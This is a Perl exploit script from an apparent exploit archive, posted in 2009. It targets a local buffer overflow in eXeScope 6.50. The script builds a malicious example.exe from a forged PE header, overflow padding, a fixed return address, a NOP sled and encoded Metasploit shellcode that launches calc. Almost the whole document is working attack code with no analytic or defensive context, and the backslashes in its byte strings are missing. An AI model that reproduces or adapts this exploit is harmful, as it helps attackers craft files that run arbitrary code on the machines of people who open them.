exescope-overflow.txt
Posted on 24 March 2009
#!/usr/bin/perl # # eXeScope 6.50 Local Buffer Overflow Exploit # # Download eXeScope 6.50 at: # http://hp.vector.co.jp/authors/VA003525/eXeSc650.zip # # Exploit by: Koshi ( heykoshi@gmail.com ) # use strict; use warnings; my $headers = "x4Dx5Ax90x00x03x00x00x00x04x00x00x00xFFxFFx00x00". "xB8x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00xB8x00x00x00". "x0Ex1FxBAx0Ex00xB4x09xCDx21xB8x01x4CxCDx21x54x68". "x69x73x20x70x72x6Fx67x72x61x6Dx20x63x61x6Ex6Ex6F". "x74x20x62x65x20x72x75x6Ex20x65x69x74x68x65x72x20". "x77x61x79x21x21x0Dx0Dx0Ax24x00x00x00x00x00x00x00". "x8Fx8AxF9xDBxCBxEBx97x88xCBxEBx97x88xCBxEBx97x88". "x48xF7x99x88xCAxEBx97x88xA2xF4x9Ex88xCAxEBx97x88". "x22xF4x9Ax88xCAxEBx97x88x52x69x63x68xCBxEBx97x88". "x00x00x00x00x00x00x00x00x50x45x00x00x4Cx01xFFx00". "xABxBAx5Cx49x00x00x00x00x00x00x00x00xE0x00xF0x01". "x00"x224; # win32_exec - EXITFUNC=process CMD=calc Size=161 Encoder=ShikataGaNai http://metasploit.com my $shellcode = "xb8x82x0ax8dx38xd9xc6xd9x74x24xf4x5ax29xc9xb1x23". "x31x42x12x83xeaxfcx03xc0x04x6fxcdx38xf0x2bx2exc0". "x01x3fx6bxfcx8ax43x71x84x8dx54xf2x3bx96x21x5axe3". "xa7xdex2cx68x93xabxaex80xedx6bx29xf0x8axacx3ex0f". "x52xe6xb2x0ex96x1cx38x2bx42xc7xc5x3ex8fx8cx99xe4". "x4ex78x43x6fx5cx35x07x30x41xc8xfcx45x65x41x03xb2". "x1fx09x20x40xe3x83xe8x2cx68xa3xd8x29xaex5cx15xba". "x6fx91xaexccx73x04x3bx44x84xbdx35x1fx14xf1x46x1f". "x15x79x2ex23x4ax4cx59x3bx22x27x5dx38x0ax4cxcex56". "xf5x6bx0cxd5x61x14x2fx93x7cx73x2fx44xe3x1axa3xe9". "xe4"; my $buff0 = "A"x4148; my $eip = "x58x32x4Dx00"; # 004d3258 - eXeScope.exe my $sled = "x90"x20; my $len = 6028 - length($shellcode); my $buff1 = "A"x$len; my $datas = $headers.$buff0.$eip.$sled.$shellcode.$buff1; open(my $files, "> example.exe"); binmode $files; print $files $datas; close($files);
